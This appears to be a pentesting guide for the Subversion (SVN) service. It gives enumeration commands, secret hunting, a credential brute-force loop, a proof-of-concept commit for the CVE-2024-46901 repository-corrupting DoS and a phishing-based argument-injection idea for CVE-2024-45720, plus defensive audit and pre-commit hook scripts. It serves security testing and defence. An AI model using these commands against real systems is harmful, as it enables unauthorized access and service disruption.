3690/tcp - Pentesting the Subversion (SVN) service


Basic Information

Subversion (SVN) is a centralized version control system (Apache license) used for software versioning and revision control.

Default port: 3690/tcp (svnserve). It can also be exposed over HTTP/HTTPS via mod_dav_svn and over svn+ssh.

PORT     STATE SERVICE
3690/tcp open  svnserve Subversion
nc -vn 10.10.10.10 3690
svnserve --version           # if shell access is obtained
svn --version                # client version leak via error messages

Enumeration

# Anonymous / authenticated listing
svn ls svn://10.10.10.203                  # list root
svn ls -R svn://10.10.10.203/repo         # recursive list
svn info svn://10.10.10.203/repo          # repo metadata
svn log svn://10.10.10.203/repo           # commit history
svn checkout svn://10.10.10.203/repo      # checkout repository
svn up -r 2                               # move working copy to revision 2
svn diff -r 1:HEAD svn://10.10.10.203/repo   # view changes

# If served over HTTP(S)
svn ls https://10.10.10.10/svn/repo --username guest --password ''

# Extract revision props (often contain build creds, URLs, tokens)
svn propget --revprop -r HEAD svn:log svn://10.10.10.203/repo

Auth & Misconfig Hunting

  • svnserve.conf may allow anon-access = read (or even write). If you can list the repository, try a checkout to dump secrets, scripts and CI tokens.
  • Repositories often store build pipelines, deployment keys and database credentials in versioned config files. Grep the working copy after checkout: grep -R "password\|secret\|token" -n .
  • If svn+ssh is enabled, user shells often only allow restricted svnserve commands; try ssh user@host svnserve -t and crafted subcommands to bypass wrappers.
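As an added defender-side check (not code from the original page), a POSIX sh script that audits a svnserve.conf for the weak settings listed above. It assumes the stock key names from svnserve.conf; the severity labels are my own.

```shell
#!/bin/sh
# Audit a svnserve.conf for the weak settings discussed above.
# Prints one finding per line and returns 1 if anything was flagged, 0 if clean.
# Keys that are absent fall back to svnserve's built-in defaults, which are
# anon-access = read and auth-access = write, so an untouched file is NOT clean.

# conf_value FILE KEY: print the value of the last uncommented "KEY = value"
# line (commented "# KEY = ..." lines are ignored); prints nothing if unset.
conf_value() {
  sed -n "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*\([^[:space:]]*\).*/\1/p" "$1" | tail -n 1
}

audit_svnserve_conf() {
  conf=$1
  bad=0
  anon=$(conf_value "$conf" anon-access); [ -n "$anon" ] || anon=read
  auth=$(conf_value "$conf" auth-access); [ -n "$auth" ] || auth=write
  case "$anon" in
    write) echo "CRITICAL: anon-access = write (anyone can commit)"; bad=1 ;;
    read)  echo "HIGH: anon-access = read (files, history and revprops are public)"; bad=1 ;;
  esac
  if [ "$auth" != write ] && [ "$auth" != read ] && [ "$auth" != none ]; then
    echo "WARN: unexpected auth-access value '$auth'"; bad=1
  fi
  # the svnserve password file holds cleartext passwords; without SASL the
  # svn:// session itself is not encrypted either
  if [ -n "$(conf_value "$conf" password-db)" ] && [ "$(conf_value "$conf" use-sasl)" != true ]; then
    echo "MEDIUM: password-db in use without use-sasl = true (cleartext passwd file, unencrypted svn://)"
    bad=1
  fi
  if [ "$(conf_value "$conf" use-sasl)" = true ]; then
    minenc=$(conf_value "$conf" min-encryption); [ -n "$minenc" ] || minenc=0
    [ "$minenc" -gt 0 ] || { echo "MEDIUM: use-sasl = true but min-encryption = 0 (svn:// stays cleartext)"; bad=1; }
  fi
  return $bad
}
```

Run it as audit_svnserve_conf /path/to/repo/conf/svnserve.conf; a non-zero exit means at least one finding was printed.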

Bruteforcing credentials (svnserve)

SASL authentication (if enabled) and simple password files are protected only by the transport, and there is no lockout by default. A quick Bash loop can try credentials:

for u in admin dev ci; do
  while IFS= read -r p; do
    # --non-interactive stops svn from prompting after a wrong password;
    # --no-auth-cache keeps the guesses out of ~/.subversion/auth
    svn ls --non-interactive --no-auth-cache --username "$u" --password "$p" svn://10.10.10.203/repo >/dev/null 2>&1 && echo "[+] $u:$p" && break
  done < /tmp/passlist
done

Recent Vulnerabilities (practical impact)

mod_dav_svn DoS via control characters (CVE-2024-46901)

  • A user with commit rights can write a path containing control characters (e.g. \x01, \x7f) that corrupts the repository, causing later checkouts/logs to fail and even crashing mod_dav_svn workers.
  • Affects Subversion ≤ 1.14.4 when served over HTTP(S) (mod_dav_svn). Fixed in 1.14.5.
  • PoC commit using svnmucc (requires valid commit creds):

    # create payload file
    printf 'pwn' > /tmp/payload
    # commit a path with a control character in its name
    svnmucc -m "DoS" put /tmp/payload $'http://10.10.10.10/svn/repo/trunk/bad\x01path.txt'

  • After the commit, normal clients may crash or refuse updates until admins manually remove the revision with svnadmin dump/filter/load.
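As an added server-side mitigation (my own example, not part of the original page or the Subversion project), a pre-commit hook that refuses transactions whose changed paths contain control characters, so a payload like the one above never becomes a revision. It assumes the standard hook interface (REPOS-PATH and TXN-NAME arguments) and the "svnlook changed" output format of two status characters, two spaces and the path.

```shell
#!/bin/sh
# pre-commit hook: reject any transaction whose changed paths contain a
# control character (the kind of path name CVE-2024-46901 abuses).
# Install server-side as $REPOS/hooks/pre-commit and make it executable.

# Returns 0 if the path contains a control character (0x01-0x1f, 0x7f), else 1.
path_has_control_char() {
  case "$1" in
    *[[:cntrl:]]*) return 0 ;;
    *)             return 1 ;;
  esac
}

# Reads "svnlook changed" output on stdin (2-char status, 2 spaces, path;
# e.g. "A   trunk/file.txt") and prints every offending path.
# Returns 0 if nothing was flagged, 1 otherwise.
filter_bad_paths() {
  status=0
  while IFS= read -r line; do
    path=${line#????}                  # drop the 4-character status column
    if path_has_control_char "$path"; then
      printf '%s\n' "$path"
      status=1
    fi
  done
  return $status
}

# Hook entry point: Subversion invokes this with REPOS-PATH and TXN-NAME.
if [ "$#" -eq 2 ]; then
  REPOS=$1
  TXN=$2
  # fail closed: if svnlook itself fails, do not let the commit through
  changes=$(svnlook changed -t "$TXN" "$REPOS") || {
    echo "pre-commit: svnlook changed failed" >&2; exit 1; }
  if bad=$(printf '%s\n' "$changes" | filter_bad_paths); then
    exit 0
  fi
  echo "Commit rejected: path names must not contain control characters:" >&2
  printf '%s\n' "$bad" | cat -v >&2    # cat -v renders \x01 as ^A in the error
  exit 1
fi
```

Because the hook runs before the transaction is committed, the rejection reaches the client as the commit error and nothing is written to the repository.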

Windows argument injection in svn client (CVE-2024-45720)

  • On Windows, "best-fit" character encoding in svn.exe allows command-line argument injection when handling specially crafted non-ASCII paths/URLs, potentially leading to arbitrary program execution.
  • Affects Subversion ≤ 1.14.3 on Windows only; fixed in 1.14.4. Attack surface: phishing a developer into running svn on an attacker-controlled URL/path.
  • Pentest angle: if you control a network share or a ZIP handed to a Windows dev, give the repo URL or working-copy path a name containing best-fit bytes that decode to " & calc.exe & "-style injected args, then trick the victim into running svn status or similar on that path.

Notes for Exploitation Workflow

  1. Check access method: svn:// (svnserve), http(s)://.../svn/ (mod_dav_svn), or svn+ssh://.
  2. Try anonymous read first; then spray common creds. If HTTP Basic is used, reuse creds found elsewhere.
  3. Enumerate hooks: hooks/pre-commit, post-commit scripts sometimes contain plaintext credentials or hostnames.
  4. Leverage svn:externals to pull additional paths from other hosts; list them with svn propget svn:externals -R . after checkout.
  5. Version leaks: HTTP response headers from mod_dav_svn usually show the Subversion & Apache version; compare against 1.14.5 to spot vulnerable targets.
  6. If you obtain filesystem access to the repo, svnadmin dump/svnlook author/svnlook dirs-changed allow offline analysis without credentials.
